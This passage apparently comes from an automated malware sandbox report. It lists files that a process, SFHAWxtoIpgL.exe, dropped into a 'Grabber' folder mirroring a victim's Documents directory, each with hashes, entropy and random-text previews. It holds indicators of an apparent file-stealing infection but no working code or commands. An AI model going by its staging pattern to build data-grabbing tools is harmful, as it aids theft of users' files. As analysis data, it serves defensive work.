Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\3dc049ac46753dc0583adb938675a965\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
